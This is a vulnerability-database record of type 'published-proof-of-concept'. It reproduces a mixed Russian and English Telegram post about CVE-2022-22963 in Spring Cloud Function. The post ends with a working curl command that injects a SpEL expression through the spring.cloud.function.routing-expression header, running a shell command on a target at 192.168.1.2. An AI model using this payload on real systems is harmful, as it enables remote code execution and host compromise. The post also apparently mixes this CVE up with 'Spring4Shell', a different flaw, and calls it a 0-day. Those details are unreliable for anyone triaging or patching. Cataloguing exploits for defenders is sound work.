{"uuid": "53db0f93-bcdd-472e-8c49-8ab546ee6035", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-22963", "type": "published-proof-of-concept", "source": "https://t.me/ShizoPrivacy/203", "content": "|CVE-2022-22963|\n\ud83d\udd25Spring4Shell.\n\ud83d\udca5CVSS:9.0\nrce 0-day exploit found-in spring cloud\nspring4shellFAQ\nSpring4Shell scan\nPoCApp\n\nA critical security vulnerability has bloomed in the Spring Cloud Function, which could lead to remote code execution (RCE) and the compromise of an entire internet-connected host.\n\n\u041f\u043e\u043a\u0430 \u0447\u0442\u043e \u043e\u0442 Spring \u043d\u0435\u0442  \u0433\u043e\u0442\u043e\u0432\u043e\u0433\u043e \u043f\u0430\u0442\u0447\u0430, \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0439 \u043c\u0435\u0440\u044b \u0441\u043e\u0432\u0435\u0442\u0443\u044e\u0442 \u043f\u043e\u043d\u0438\u0437\u0438\u0442\u044c \u0432\u0435\u0440\u0441\u0438\u044e jdk.\n\u041f\u0440\u0438\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u044e \u0430\u0440\u0445\u0438\u0432 \u043e\u0442 vx-underground \u043d\u0438\u0436\u0435.\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043f\u0430\u0442\u0447, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430 \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u0440\u0430\u0437\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f.\n\nSo far, there is no ready-made patch from Spring, as a temporary measure, it is advised to downgrade the jdk version.\nI attach the archive from vx-underground below.\nLink to the patch , which is currently being developed.\n\nThe exploit is easy to execute using the curl command:\ncurl -i -s -k -X $\u2019POST\u2019 -H $\u2019Host: 192.168.1.2:8080\u2032 -H $\u2019spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\\\u201dtouch /tmp/test\u201d)\u2019 \u2013data-binary $\u2019exploit_poc\u2019 $\u2019http://192.168.1.2:8080/functionRouter\u2019\n#cve #exploit", "creation_timestamp": "2022-04-14T01:24:45.000000Z"}